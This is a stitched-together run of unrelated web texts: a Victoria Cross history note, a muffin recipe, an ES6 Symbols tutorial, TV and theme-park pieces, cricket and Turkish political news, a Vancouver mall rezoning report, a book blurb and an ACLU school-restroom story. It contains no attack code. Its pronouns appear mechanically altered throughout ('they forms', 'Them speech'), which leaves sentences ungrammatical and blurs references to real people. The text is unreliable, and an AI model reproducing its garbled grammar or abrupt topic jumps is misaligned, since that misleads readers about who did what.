Not two weeks after their 26th birthday , Sepoy Khudadad Khan and their machine gun team were facing a severe German attack , October 31st 1914 . They remained at their post despite wounds and the loss of the other men of their detachment , keeping their gun firing-the only remaining machine gun in action- only leaving after the enemy had bypassed their position believing them dead . For their actions , Sepoy Khudadad was awarded the Victoria Cross , the Empire 's highest award , themselves being the first South Asian recipient of the decoration .
“ The Jewel of Punjab ”
Today , Lahore is the capital city of Punjab Province in Pakistan , known affectionately as “ The Jewel of Punjab. ” It lies close to the border with India . The city was a place of contention and violence during partition in 1947 but exists now as a thriving commercial and cultural centre .
© Centenary Digital Ltd & Author
Did you know that many stores bought breakfast foods like blueberry muffins , pancake mix and granola actually do n't contain real blueberries ? ! They are sometimes totally fake ‘ blueberries ' or ‘ blueberry pieces ' which are made up of sugars , corn syrup and food colouring , some of the brands that do this may shock you – I know it shocked me ! It can be disheartening when you are trying hard to eat clean and you find out that the ‘ healthy ' breakfast you were eating and instagraming actually is n't as nutritious as you thought . The appeal of store bought breakfast foods is that they appear healthy and convenient and although some of it totally is , that 's not always the case . Wherever possible , I try to make my own breakfasts for the week in batches so that I know 100 % all the ingredients and I can just grab it before work and go .
This sugar free blueberry muffins recipe is naturally sweetened with maple syrup and keep in an airtight container for up to 5 days so you can make them on a Sunday and enjoy them all week .
Ingredients – Sugar Free Blueberry Muffins Recipe
280g whole wheat flour
120g organic white flour
1 tablespoon baking powder
½ teaspoon bicarbonate of soda
300g plain Greek yogurt
150g maple syrup
2 eggs
105g oil – I used coconut oil however olive oil can be used
150g fresh blueberries
pinch of salt
1 teaspoon cinnamon
½ teaspoon vanilla bean paste
Method – Sugar Free Blueberry Muffins Recipe
Preheat the oven to 200 Celsius and line a 12 muffin tray with muffin cases .
Using an electric mixer , whisk the eggs together , then add the maple syrup and vanilla and whisk . Lastly , add the oil and mix well . If you are using coconut oil , melt it first before mixing in .
In a separate bowl , mix together the flours , baking soda , bicarbonate of soda , salt and cinnamon .
Pour the egg , oil , vanilla and maple syrup mixture into the dry bowl and fold with a wooden spoon .
Gently mix in the yogurt and blueberries and mix well using a wooden spoon .
Scoop the mixture into the muffin cases and bake for 10 mins . After 10 mins , reduce the heat to 185 . Celsius and bake for a further 10-15 mins or until the tops are golden brown and a skewer comes out clean when poked into the muffin .
Cake stand is from Laura Ashley Home
Did you enjoy this Sugar Free Blueberry Muffins Recipe ? Try my other sugar free muffin recipes here :
Pistachio and Raspberry – Sugar Free Muffins Recipe – Pistachio and Raspberry
Roasted Hazelnut – Sugar Free Muffins Recipe – Roasted Hazelnut and Pistachio with Orange and Maple Syrup Glaze
Chocolate and Pistachio – Sugar Free Chocolate and Pistachio Recipe
Thanks for listening to that , and let 's go into symbols now ! For a bit of context , you may want to check out the last two articles , – on iterators and generators – where we first talked about Symbols .
Before getting into it , let me shamelessly ask for your support if you 're enjoying my ES6 in Depth series . Your contributions will go towards helping me keep up with the schedule , server bills , keeping me fed , and maintaining Pony Foo as a veritable source of JavaScript goodies .
Like I did in previous articles on the series , I would love to point out that you should probably set up Babel and follow along the examples with either a REPL or the babel-node CLI and a file . That 'll make it so much easier for you to internalize the concepts discussed in the series . If you are n't the “ install things on my computer ” kind of human , you might prefer to hop on CodePen and then click on the gear icon for JavaScript – they have a Babel preprocessor which makes trying out ES6 a breeze . Another alternative that 's also quite useful is to use Babel 's online REPL – it 'll show you compiled ES5 code to the right of your ES6 code for quick comparison .
What are Symbols ?
Symbols are a new primitive type in ES6 . If you ask me , they 're an awful lot like strings . Just like with numbers and strings , symbols also come with their accompanying Symbol wrapper object .
We can create our own Symbols .
var mystery = Symbol ( )
Note that there was no new . The new operator even throws a TypeError when we try it on Symbol .
var oops = new Symbol ( )
For debugging purposes , you can describe symbols .
var mystery = Symbol ( 'this is a descriptive description ' )
Symbols are immutable . Just like numbers or strings . Note however that symbols are unique , unlike primitive numbers and strings .
console .log ( Symbol ( ) === Symbol ( ) ) console .log ( Symbol ( 'foo ' ) === Symbol ( 'foo ' ) )
Symbols are symbols .
console .log ( typeof Symbol ( ) ) console .log ( typeof Symbol ( 'foo ' ) )
There are three different flavors of symbols – each flavor is accessed in a different way . We 'll explore each of these and slowly figure out what all of this means .
You can access local symbols by obtaining a reference to them directly
You can place symbols on the global registry and access them across realms
“ Well-known ” symbols exist across realms – but you ca n't create them and they 're not on the global registry
What the heck is a realm , you say ? A realm is spec-speak for any execution context , such as the page your application is running in , or an < iframe > within your page .
The “ Runtime-Wide ” Symbol Registry
There are two methods you can use to add symbols to the runtime-wide symbol registry : Symbol.for ( key ) and Symbol.keyFor ( symbol ) . What do these do ?
Symbol.for ( key )
This method looks up key in the runtime-wide symbol registry . If a symbol with that key exists in the global registry , that symbol is returned . If no symbol with that key is found in the registry , one is created . That 's to say , Symbol.for ( key ) is idempotent . In the snippet below , the first call to Symbol.for ( 'foo ' ) creates a symbol , adds it to the registry , and returns it . The second call returns that same symbol because the key is already in the registry by then – and associated to the symbol returned by the first call .
Symbol.for ( 'foo ' ) === Symbol.for ( 'foo ' )
That is in contrast to what we knew about symbols being unique . The global symbol registry however keeps track of symbols by a key . Note that your key will also be used as a description when the symbols that go into the registry are created . Also note that these symbols are as global as globals get in JavaScript , so play nice and use a prefix and do n't just name your symbols 'user ' or some generic name like that .
Symbol.keyFor ( symbol )
Given a symbol symbol , Symbol.keyFor ( symbol ) returns the key that was associated with symbol when the symbol was added to the global registry .
var symbol = Symbol.for ( 'foo ' ) console .log ( Symbol.keyFor ( symbol ) )
How Wide is Runtime-Wide ?
Runtime-wide means the symbols in the global registry are accessible across code realms . I 'll probably have more success explaining this with a piece of code . It just means the registry is shared across realms .
var frame = document .createElement ( 'iframe ' ) document .body.appendChild ( frame ) console .log ( Symbol.for ( 'foo ' ) === frame.contentWindow.Symbol.for ( 'foo ' ) )
The “ Well-Known ” Symbols
Let me put you at ease : these are n't actually well-known at all . Far from it . I did n't have any idea these things existed until a few months ago . Why are they “ well-known ” , then ? That 's because they are JavaScript built-ins , and they are used to controlling parts of the language . They were n't exposed to user code before ES6 , but now you can fiddle with them .
A great example of a “ well-known ” symbol is something we 've already been playing with on Pony Foo : the Symbol.iterator well-known symbol . We used that symbol to define the @ @ iterator method on objects that adhere to the iterator protocol . There 's a list of well-known symbols on MDN , but few of them are documented at the time of this writing .
One of the well-known symbols that is documented at this time is Symbol.match . According to MDN , you can set the Symbol.match property on regular expressions to false and have them behave as string literals when matching ( instead of regular expressions , which do n't play nice with .startsWith , .endsWith , or .includes ) .
This part of the spec has n't been implemented in Babel yet , – I assume that 's just because it 's not worth the trouble – but supposedly it goes like this .
var text = '/foo/ ' var literal = /foo/ literal [ Symbol.match ] = false console .log ( text.startsWith ( literal ) )
Why you 'd want to do that instead of just casting literal to a string is beyond me .
var text = '/foo/ ' var cast = /foo/ .toString ( ) console .log ( text.startsWith ( cast ) )
I suspect the language has legitimate performance reasons that warrant the existence of this symbol , but I do n't think it 'll become a front-end development staple anytime soon .
Regardless , Symbol.iterator is actually very useful , and I 'm sure other well-known symbols are useful as well .
Note that well-known symbols are unique , but shared across realms , even when they 're not accessible through the global registry .
var frame = document .createElement ( 'iframe ' ) document .body.appendChild ( frame ) console .log ( Symbol.iterator === frame.contentWindow.Symbol.iterator )
Not accessible through the global registry ? Nope !
console .log ( Symbol.keyFor ( Symbol.iterator ) )
Accessing them statically from anywhere should be more than enough , though .
Symbols and Iteration
Any consumer of the iterable protocol obviously ignores symbols other than the well-known Symbol.iterator that would define how to iterate and help identify the object as an iterable .
var foo = { [ Symbol ( ) ] : 'foo ' , [ Symbol ( 'foo ' ) ] : 'bar ' , [ Symbol.for ( 'bar ' ) ] : 'baz ' , what : 'ever ' } console .log ( [ ... foo ] )
The ES5 Object.keys method ignores symbols .
console .log ( Object .keys ( foo ) )
Same goes for JSON.stringify .
console .log ( JSON .stringify ( foo ) )
So , for .. in then ? Nope .
for ( let key in foo ) { console .log ( key ) }
I know , Object.getOwnPropertyNames . Nah ! – but close .
console .log ( Object .getOwnPropertyNames ( foo ) )
You need to be explicitly looking for symbols to stumble upon them . They 're like JavaScript neutrinos . You can use Object.getOwnPropertySymbols to detect them .
console .log ( Object .getOwnPropertySymbols ( foo ) )
The magical drapes of symbols drop , and you can now iterate over the symbols with a for .. of loop to finally figure out the treasures they were guarding . Hopefully , they wo n't be as disappointing as the flukes in the snippet below .
for ( let symbol of Object .getOwnPropertySymbols ( foo ) ) { console .log ( foo [ symbol ] ) }
Why Would I Want Symbols ?
There are a few different uses for symbols .
Name Clashes
You can use symbols to avoid name clashes in property keys . This is important when following the “ objects as hash maps ” pattern , which regularly ends up failing miserably as native methods and properties are overridden unintentionally ( or maliciously ) .
“ Privacy ” ?
Symbols are invisible to all “ reflection ” methods before ES6 . This can be useful in some scenarios , but they 're not private by any stretch of imagination , as we 've just demonstrated with the Object.getOwnPropertySymbols API .
That being said , the fact that you have to actively look for symbols to find them means they 're useful in situations where you want to define metadata that should n't be part of iterable sequences for arrays or any iterable objects .
Defining Protocols
I think the biggest use case for symbols is exactly what the ES6 implementers use them for : defining protocols – just like there 's Symbol.iterator which allows you to define how an object can be iterated .
Imagine for instance a library like dragula defining a protocol through Symbol.for ( 'dragula.moves ' ) , where you could add a method on that Symbol to any DOM elements . If a DOM element follows the protocol , then dragula could call the el [ Symbol.for ( 'dragula.moves ' ) ] ( ) user-defined method to assert whether the element can be moved .
Get the biggest celebs stories by email Subscribe Thank you for subscribing We have more newsletters Show me See our privacy notice Could not subscribe , try again later Invalid Email
Fun House is back with a wacky twist as Pat Sharp and the twins reunite for their big comeback .
The 90s TV classic is poised for a return with the original cast and they ca n't wait to relive the hilarity and nostalgic of the popular show .
( Image : WPR Agency )
The trio will be back as family pub restaurant Fayre & Square teams with Wacky Warehouse to make our dreams come true - if only for a day .
Four teams will compete in a Family Fun House competition in Lichfield on Saturday 13 June , as the contestants go head-to-head .
( Image : ITV )
This time , the parents can join in the fun with four lucky teams - an adult and a child from each family - as they clash in the gunge tank quiz , the go karts race and more .
( Image : WPR Agency )
Pat said : `` It 's been a dream of mine to bring back Fun House for over a decade , so I 'm over the moon that ( in some shape or form ) it 's finally happening !
`` The Family Fun House day looks set to be extremely exciting and Melanie , Martina and I ca n't wait to get out there and do what we do best – host Fun House . ”
Video Loading Video Unavailable Click to play Tap to play The video will start in 8 Cancel Play now
The families will be competing for the cahnce to win a £1,000 holiday , with the winning team getting to enter the Fun House itself to win even more prizes .
Parents can nominate themselves and a child at www.fayre-square.com , with the deadline for nominations being midnight on Saturday 30 May .
Disney Quest Review
I took my son to Disney Quest today . It was not our first trip . In fact , this was aroud our tenth visit to DQ . And it was probably our last .
The Disney Magic left this place at least five years ago , but no one at Disney seems to have noticed , or cared . Perhaps the company is still making a healthy profit from Disney Quest and , if that 's the case , I tip my hat to them . Unlike some fans , I realize that Disney is a business . As such , they exist to make a profit and a return for their shareholders .
Having said that , I suspect the internal conversation goes a little like this .
Staffperson One : “ We should just close down Disney Quest . ”
Staffperson Two : “ I am not so sure — When there is a monsoon or a hurricane warning and people are afraid to go to the parks , business is brisk . ”
Staffperson One : “ Like I said …We should just close down Disney Quest . ”
If Disney Quest is a cash cow , so be it . Most business cash cows eventually have to be put down . What I can tell you , without a doubt , is Disney Quest is the distant past — not the future — of the Downtown Disney area .
Memo from Splitsville : “ Sorry Disney Quest , we are going to have to let you go . ”
In my humble opinion , here are the Good , the Bad , and the Ugly sides of Disney Quest , and the food options available there .
The Good : Despite being Easter break for many on the East Coast , it was not very crowded . ( Red Alert ) Many of the games were in “ walk-up ” status . We have been there during more crowed times and , believe me , standing in a three-person line waiting for an eight year-old to stop hitting replay is excruciating . Imagine a theme park ride line that never moves — or jamming a fork in your right eye . Either way , you get the idea .
Also good : The games are all free…Sort of . After you pay the $ 43.67 per person for ages 10 and up . To put it in perspective , that 's about 175 quarters per person . ( Four rolls of quarters . ) Even assuming each game is 50 cents , you still have to play 80 games per person to break even at a normal arcade . Which is easily doable , if there are no lines .
Speaking of which , when was the last time you even saw — let alone walked into — an arcade ? Few remain ( on this planet , anyway ) , and for good reason .
For a no obligation , FREE Quote with new bookings contact our sponsor Magical Vacation Planner by calling : 1 ( 407 ) 442-0289 Or for a free no obligation quote with new bookings you can fill out the form by Clicking HERE !
Having said that , there is some joy that comes from just hitting “ replay ” every time you get the “ game over ” screen without having to feed the machine quarters or tokens . ( Also , for the more progressive parents out there , nothing builds self-esteem for a 9 year-old like never losing at ‘ Berzerk ' . )
One more good thing : They sell beer and wine . Trust me , you will need it . Of course , to say that the selection is “ limited ” would not be fair to… well , any other place that sells beer and wine . A few Budweiser products are available , as well as the Sam Adams seasonal brew , and some mini-bottle wine choices .
The Bad : You have to pay $ 43.67 per person ! Unless you are the type of parents that drop your young kids off at the pool and say , “ I will pick you up after dark , ” at least one of the adults is along for the ride ( See : Beer and wine , above ) , and it can get expensive pretty fast .
Also bad : They offer most of the most iconic video games from your childhood . You would think that would be listed under ‘ good ' , right ? Oh no , because Frogger , Joust , Asteroids , Ms. Pacman , and all their friends from the 80 's are not as fun as they once were — Especially when there are three eight year-olds waiting in line for you to die ( or at least for your game character to ) and NOT hit the replay button . It 's a lot of pressure . It really is .
The Ugly : The food and the service are some of the worst I have ever experienced anywhere . Not anywhere on Disney property — anywhere on the planet . It is really an embarrassment to the high standards that Disney tries to uphold across their theme park properties .
To state this a bit more strongly : I do n't think there is a theme park , a fast food restaurant , a waffle house , or a gas station bathroom anywhere in the solar system that is worse . I 've gotten better service at an abandoned Stuckey 's on the interstate .
There was a family of three and a family of two in line in front of me . And yet it took a mystifying 14 minutes to be waited on . There was one cashier and six other people behind the counter . In other words , there were more people working than were in line . The staff stood diligently at their stations waiting for someone to order something , while the line did not — and could not — move .
Because the one cashier on duty was explaining to the family of three how many D.D.P . credits each and every item on the menu was . And then explained it again .
Could any of the six other people step up to the second register and help another person in line ? The answer — and I do n't actually blame the staff — is no . Evidently , each team member was trained to stand at their or their station and only do the one task ( say , fill soda cups , or place hot dogs on a tray ) assigned . No deviation , no flexing , no assisting in other ways as needed .
In summary , if Disney Quest is crowded , it can be a painful hassle . If it is not crowded , Disney Quest is still a mediocre experience and an embarrassment to the parent company and all it holds dear… And it ca n't stay in business much longer .
If you want to hang out on a rainy day and play old video games have at it . The first time might be fun . I plan to eat or drink at Disney Quest after reading this review , may God have mercy on your soul .
Stafanie Taylor : `` I believe we are stepping in the right direction . It 's good that the retainers and match fees have been increased and the girls love it '' © IDI/Getty Images
West Indies Women cricketers on retainer contracts with the WICB are set to receive enhanced compensation packages from October 1 , including increases in annual retainer fees , sponsorship payments , match fees and captains ' allowances . The number of women on retainer contracts will also be increased to 15 , from the current 11 . The estimated increase will cost the WICB just under US $ 600,000 for the upcoming year .
Captain Stafanie Taylor , who led their victorious World T20 campaign earlier this year , welcomed the move .
`` I believe we are stepping in the right direction . England and Australia are the two top teams where women 's cricket is concerned and I think we can mirror what they are doing and get on their level , '' Taylor said . `` It 's good that the retainers and match fees have been increased and the girls love it . We hope that , as time goes by , more things will be improved . ''
Former captain Merissa Aguilleira also lauded the development . Noting the team 's hard work and success , Aguilleira added that `` an increase like this will only encourage [ the team ] to work harder and continue representing the people of the Caribbean to the best of [ their ] abilities . ''
The new packages , which emerged from negotiations between the WICB and the West Indies Players ' Association ( WIPA ) , were hailed by both parties . WICB CEO Michael Muirhead said that the packages would `` serve as an additional incentive for the current set of women '' and also `` serve as a drawing card to more women to be attracted to cricket '' . WIPA president and CEO Wavell Hinds said the enhanced packages were `` well deserved '' given the women 's teams ' performances over the past decade .
West Indies Women 's next international assignment is a home five-match ODI series against England in October . The last three ODIs of the series will count towards Women 's Championship points , offering the sides the chance to seal their spot in next year 's World Cup in England . West Indies are currently second in the Women 's Championship , behind Australia .
© ESPN Sports Media Ltd .
Akşener hints at run for presidency in 2019 as they forms ‘ Good Party '
ANKARA
Meral Akşener , an experienced right-wing politician and former interior minister , formed their long-anticipated political party under the title of the “ Good Party ” on Oct. 25 , hinting at a run for Turkey 's presidency against President Recep Tayyip Erdoğan in 2019 .
Akşener submitted a petition for the formation of the Good Party to the Interior Ministry earlier in the day before they held their first meeting with the founders and sympathizers of the new party .
“ Turkey will be good , ” Akşener said in their first address to their followers , referring to the name of the party . “ Turkey and its people are tired . The state has corroded . Public order has dissolved . There is no other way but to change the entire political climate , ” they added .
Akşener and some other deputies were expelled from the Nationalist Movement Party ( MHP ) amid disagreements with MHP Chair Devlet Bahçeli , who has sided with President Erdoğan on key issues in recent months , including the shift to an executive presidential system .
In 2016 initiatives by Akşener-led dissidents to hold an extraordinary convention within the MHP to challenge Bahçeli were nixed in controversial court decisions , pushing the veteran politician to form their own party . Four MHP lawmakers and one Republican People 's Party ( CHP ) lawmaker joined the Good Party on its first day , securing five seats for Akşener in the parliament .
Although the Good Party includes figures who have come from an MHP background , Akşener 's Good Party aims to target center-right , nationalist and democratic voters through a party program appealing to different political perspectives .
‘ They want me as president '
Akşener 's first meeting took place at the Nazım Hikmet Cultural Center that belongs to the CHP 's Yenimahalle Municipality in Ankara , as a number of major hotels and convention centers refused to rent their halls to the Good Party .
Them speech was interrupted by chants from participants calling their “ Prime Minister Meral , ” to which they responded by hinting at a presidential run .
“ No , no . Not prime minister but president . All my friends and founders at the party insist I should become the president , ” said Akşener , signalling their potential nomination for the presidential election due to take place in late 2019 .
Democracy under threat
“ It 's time to say new things . Yes , we have major problems . But Turkey has enough powers to resolve them . We have hopes and dreams . We want a prosperous and just Turkey . We want a free society . We want a happy Turkey , ” said Akşener .
“ Good is justice , good is determination . Good is hope , good is future , knowledge . Good is richness , courage . Good means civilization and only the brave will pave this road , ” they added , describing Turkish democracy as “ under threat . ”
Education , justice , economy
Akşener said the Good Party 's priority will be to make Turkey one of the largest economies in the world , as they instructed their economy team to maintain no less than six percent annual growth when they are in power .
Increasing the quality of education , providing full-scale health services to everyone and fixing the problems of the judiciary have also been cited by Akşener as their priorities .
“ Politically driven court decisions are even more dangerous than the enemy 's bullets . We will not allow politics to take control of the justice system , ” they said .
Fight against FETÖ to continue
Akşener also referred to the ongoing fight against the Fethullahist Terror Organization ( FETÖ ) , describing the July 15 coup attempt as a “ most treacherous move ” against the Turkish people and the state .
“ FETÖ , this treacherous gang , has been the main actor of each and every operation [ against Turkey ] not only since July 15 , but since 2004 ... The people saved the state in the streets , ” they said , indirectly criticizing the Justice and Development Party 's ( AKP ) alliance with the group in the past .
‘ Media should not be under pressure '
Touching on Turkey 's democratic problems , Akşener emphasized the importance of a “ functioning , competitive political system . ”
“ Media should not be under pressure . Democratic participation , a strong parliament and the national will are irreplaceable . We will democratize the law on political parties in the light of contemporary democratic principles and the criteria of the Venice Commission , ” they said .
They also suggested decreasing the national threshold applied for parliamentary elections to five percent from the current 10 percent .
Vancouver City Council has approved Oakridge Centre 's rezoning and redevelopment proposal with a 6-3 majority vote . It will allow the construction of 14 towers between 9 to 44 storeys tall while also doubling the amount of retail available at the 1959-built mall .
The scale of the development is unprecedented within the city proper limits and when complete , the tallest of the towers will become the City of Vancouver 's highest outside of downtown Vancouver .
Image : City of Vancouver/Ivanhoe Cambridge/Westbank
Oakridge Centre is the largest of the major redevelopments planned along the Canada Line . A redevelopment project at the 25.4-acre Pearson Dogwood site at 57th Avenue and Cambie Street will renew Vancouver Coastal Health 's medical facilities , bring 3,083 residential units , green spaces , and a new/additional Canada Line station . Further down at the foot of Cambie Street , Marine Gateway has provided a catalyst for additional major development projects within the immediate vicinity .
Image : City of Vancouver/Ivanhoe Cambridge/Westbank
This will be the only “ Town Centre ” within the City of Vancouver outside of downtown Vancouver whereas neighbouring Burnaby has three such hubs at Metrotown , Brentwood and Lougheed .
In addition to being served by the Canada Line , Oakridge Centre is located in the middle of Vancouver at the crossroads of two of the city 's major arterial roads ( 41st Avenue and Cambie Street ) .
Three public hearings were held at City Hall on Monday , Tuesday and Friday to allow all 150+ speakers a chance to voice their views . The City of Vancouver received a total of 400+ written and spoken responses prior and during the public hearing period .
While a majority of the speakers were in favour of the project and its elements , local neighbourhood residents came out in full force to voice their concerns over the traffic additional density would bring , shadowing caused by tower heights , potential strain in local services and infrastructure , local impact of phased construction over a decade long period , issues over transparency and the public consultation process , and their desire to maintain a small-scale , intimate “ sense of community . ”
Looking north from Tisdail Park
Image : City of Vancouver/Ivanhoe Cambridge/Westbank
Looking south from Queen Elizabeth Park
Image : City of Vancouver/Ivanhoe Cambridge/Westbank
A new concern that came up over numerous occasions throughout the public hearings related to the capacity of the “ already overcrowded ” SkyTrain Canada Line . According to TransLink , $ 7.7-million in capacity upgrades are required for Oakridge-41st Station if the project is to be built as proposed , but no funding sources for the improvements have been identified .
Most local neighbourhood residents who spoke at the hearings were against the project , although surveys indicated that city residents on a whole are greatly in favour and appreciate what the new Oakridge Centre will bring to the geographical centre of Vancouver . The future of Vancouver relies on densification if sustainability and economic growth is to be achieved .
In 2007 , City Council approved a similar but significantly smaller development policy plan for Oakridge Centre with fewer buildings , less public amenities , and shorter heights limited to 24 storeys tall . The approved policy plan called for a total of 2.586-million square feet including 950,000 square feet of retail , 326,000 square feet of office space , 60,000 square feet of public amenities and 1.25-million square feet of residential .
Original 2007 vision from the approved Oakridge Centre policy statement .
Image : City of Vancouver/Ivanhoe Cambridge/Westbank
The Canada Line , which opened in 2009 , has proved to be much more of a success than originally envisioned prior to its completion , especially in 2007 when the development policy plan was approved . Planners and proponents are citing the new SkyTrain line 's success as one of the main reasons for pursuing a denser and more ambitious project .
A re-submitted plan in 2012 offered a much more grandiose version that likened the mall 's precinct as a burgeoning town centre along the SkyTrain route – a future that is similar to SkyTrain-adjacent redevelopments planned for Brentwood Town Centre and Station Square .
The final plan that was deliberated in City Council this week proposed a total scale of 4.57-million square feet including 1.385-million square feet of retail , 424,300 square feet of office space , 70,000 square feet of public amenities and 2.761-million square feet of residential .
Altogether , and in great contrast , this is an increase from the existing mall area of 822,000 square feet comprised of 620,000 square feet of retail , 126,000 square feet of office space , 26,000 square feet of public amenities , and 50,000 square feet of residential .
Today
Image : City of Vancouver/Ivanhoe Cambridge/Westbank
Future
Image : City of Vancouver/Ivanhoe Cambridge/Westbank
Image : City of Vancouver/Ivanhoe Cambridge/Westbank
Image : City of Vancouver/Ivanhoe Cambridge/Westbank
When complete , the new 28-acre shopping centre is expected to house up to 6,200 new residents in 2,914 units ( 290 social housing units , 290 market rental units , and 2,334 market units ) and create space for 5,000 jobs ( up from the existing 2,000 ) including 990 office jobs and 2,210 retail jobs .
Image : City of Vancouver/Ivanhoe Cambridge/Westbank
A portion of the mall expansion will be open-air and exposed to the elements along a new high street and could allow certain retail units the option to open after mall hours . The expanded fashion , refreshed anchors , pedestrian street retail , expanded dining , and a broader range of community services come together to make Oakridge an integrated community and retail centre . This also means new and relocated spaces for Hudson 's Bay , Safeway , a new Target store to replace Zellers , and an unnamed fourth anchor tenant .
( article continues below… )
Image : City of Vancouver/Ivanhoe Cambridge/Westbank
Image : City of Vancouver/Ivanhoe Cambridge/Westbank
Image : City of Vancouver/Ivanhoe Cambridge/Westbank
Image : City of Vancouver/Ivanhoe Cambridge/Westbank
Image : City of Vancouver/Ivanhoe Cambridge/Westbank
Image : City of Vancouver/Ivanhoe Cambridge/Westbank
Image : City of Vancouver/Ivanhoe Cambridge/Westbank
Image : City of Vancouver/Ivanhoe Cambridge/Westbank
$ 148.7-million in developer-funded public amenities will be accompanied the project including a new 70,000 square foot Oakridge Civic Centre to provide a consolidated community centre/seniors ' centre , a new library ( 25,000 sq . ft. ) and a 69-space daycare ( 9,000 sq . ft. ) .
Image : City of Vancouver/Ivanhoe Cambridge/Westbank
A large 9-acre mall rooftop park commons area , where mall rooftop parking is currently located , is to include a water/pond garden area , lawn space and playing fields , dining terraces , community gardens and urban agriculture , recreational area , children 's play area , a 0.8-km long walking and running loop trail , and a rooftop restaurant . The rooftop park commons area will be highly accessible from six large entry points and regulated as a City of Vancouver park with the associated Park Board bylaws .
( article continues below… )
Image : City of Vancouver/Ivanhoe Cambridge/Westbank
Image : City of Vancouver/Ivanhoe Cambridge/Westbank
Image : City of Vancouver/Ivanhoe Cambridge/Westbank
Image : City of Vancouver/Ivanhoe Cambridge/Westbank
The design of the rooftop park commons area is an innovative and unique concept to Vancouver . Its design is comparable to other rooftop parks around the world such as Jubilee Park at Canary Wharf in London , Illumination Lane at Lincoln Centre and High Line in New York City , and Grin Grin Park in Fukouka , Japan .
Click on images for enlarged version .
Image : City of Vancouver/Ivanhoe Cambridge/Westbank
Image : City of Vancouver/Ivanhoe Cambridge/Westbank
To support the project elements , there will be 5,400 stalls of commercial parking and another 1,570 stalls to support the residential units .
Besides the development 's local economic spinoffs , it will be a windfall for the City of Vancouver bringing $ 45.7 million in one-time Development Cost Charges and an additional $ 13.7 million in property taxes per year . Including $ 79.17-million for the value of 290 social housing units , the entire project will bring $ 228.3-million in privately funded public amenity benefits .
The mall will remain open during construction , which will be undertaken through five construction phases at different areas of the mall site . Given the scale of the project , three architectural firms – Henriquez Partners Architects , Stantec Architecture and Gensler – are involved in the design process .
Image : City of Vancouver/Ivanhoe Cambridge/Westbank
Ivanhoe Cambridge , the owner of the mall and proponent of the project , has also partnered with Westbank Development to carry out the new Oakridge Centre 's major residential component .
The project is expected to cost $ 1.5-billion and will be fully complete in 2024 . The first phase on the Safeway parking lot and the construction of the Civic Centre will be completed in the summer of 2019 . The rooftop park commons area will be completed in the summer of 2024 as part of the final phase as its space is needed for construction staging .
HEY YOU ! Sign Up to our Newsletter for exclusive content , contests , and perks .
DH Vancouver Staff Daily Hive is the evolution of Vancity Buzz , established in Vancouver in 2008 . In 2016 , the publication rebranded and opened newsrooms in Calgary , Toronto , and Montreal . Send story tips to @ DailyHiveVan @ DailyHiveVancouver Daily Hive is the evolution of Vancity Buzz , established in Vancouver in 2008 . In 2016 , the publication rebranded and opened newsrooms in Calgary , Toronto , and Montreal . Send story tips to [ email protected ]
Please enable JavaScript to view the comments powered by Disqus .
Paul Nathanson and Katherine Young argue that men have routinely been portrayed as evil , inadequate , or as honorary women in popular culture since the 1990s . These stereotypes are profoundly disturbing , the authors argue , for they both reflect and create a hatred and thus further fracture an already fractured society . In Spreading Misandry they show that creating a workable society in the twenty-first century requires us to rethink feminist and other assumptions about men .
The first in an eventual three part series , Spreading Misandry offers an impressive array of evidence from everyday life – case studies from movies , television programs , novels , comic strips , and even greeting cards – to identify a phenomenon that is just now being recognised as a serious cultural problem . Discussing misandry – the sexist counterpart of misogyny – the authors make clear that this form of hatred must not be confused with reverse sexism or anger and should neither be trivialised nor excused . They break new ground by discussing misandry in moral terms rather than purely psychological or sociological ones and refer critically not only to feminism but to political ideologies on both the left and the right . They also illuminate the larger context of this problem , showing that it reflects the enduring conflict between the Enlightenment and romanticism , inherent flaws in postmodernism , and the dualistic ( `` us '' versus `` them '' ) mentality that has influenced Western thought since ancient times . A groundbreaking study , Spreading Misandry raises serious questions about justice and identity in an increasingly polarised society . It is important for anyone in interested in ethics , gender , popular culture , or are just concerned about the society we are creating . `` Spreading Misandry . . . does make a convincing argument that , since the 1990s , . . . Men , have become society 's official scapegoats and held responsible for all evil . . . Women are society 's official victims and held responsible for all good . '' -- Independent on Sunday , 4 August , 2002
NASHVILLE — The American Civil Liberties Union of Tennessee says it filed a federal complaint against Sumner County schools , saying the Middle Tennessee school district 's policy that bars transgender students from using restrooms corresponding with their `` gender identity '' violates federal anti-discrimination law and the U.S. Constitution .
The complaint was filed with the U.S. Department of Education 's Office of Civil Rights on behalf of a transgender high school first-year student and their parents .
It calls for the district to be required to allow the student use the girls ' restrooms and locker rooms at school as well as develop a new policy ensuring that transgender students be treated the same as other students .
The ACLU-Tennessee filing comes in the midst of a boiling debate in Tennessee and nationally over transgender students ' use of restrooms . The U.S. Department of Justice recently sued the state of North Carolina over a somewhat similar law . Just last week the Obama administration issued guidance directing public schools to allow transgender students to use bathrooms matching their gender identity or risk losing federal funding .
In the ACLU-Tennessee news release , cooperating attorney Abby R. Rubenfeld said `` no student should have to endure the stigma and marginalization of being segregated from the rest of the student body . These kinds of blanket bans prevent transgender students from being treated fairly and equally at school . ''
Rubenfeld , who is in private practice , called Sumner County 's policy `` not only misguided , it 's a direct violation of Title IX and the Fourteenth Amendment . ''
According to ACLU-Tennessee , the student is only allowed to use the faculty or the special needs bathroom . The complaint says that to avoid the stigma of using segregated restrooms , the student either tries to avoid using a restroom at all while at school or uses the girls ' restroom under `` fear of punishment '' by school officials .
The Sumner County situation became a focal point at one point in Tennessee lawmakers ' debate this year over transgender students . The bill would have required public transgender students to use bathrooms and locker facilities matching their biological sex at birth rather than a student 's gender identity .
Republican proponents of the bill accused ACLU-Tennessee officials of threatening to sue the system if they refused to change their policy . The House sponsor eventually shelved the measure .
ACLU-Tennessee said in its news release today that `` after trying unsuccessfully to work out reasonable accommodations with the school system for the entire 2015-2016 academic year , the student 's family sought legal assistance . On March 4 , 2016 , ACLU-TN sent a letter to the director of schools requesting a meeting to resolve the issues . ''
The letter , ACLU-Tennessee said , urged school officials to `` discretely come to a reasonable solution in collaboration with the family '' and specifically stated it was the group 's and `` family 's desire to handle the situation without litigation .
However , the group said , Sumner County 's school system has indicated it is n't willing to to alter its restroom policy to conform to the requirements of federal law and the needs of the students involved .
`` In our experience , when transgender students , their families and school systems have been able to sit down and discuss a student 's particular situation , more often than not they are able to come to a workable solution together at the local level , '' said Hedy Weinberg , ACLU-Tennessee executive director .
They said the civil rights advocacy group `` tried to work with the school district to find a practical solution . We now hope that the Office for Civil Rights will act quickly to ensure that transgender students in Sumner County are treated fairly and that the investigation results in the school system better understanding the needs of all students in their schools rather than acting out of fear , confusion and misunderstanding . ''
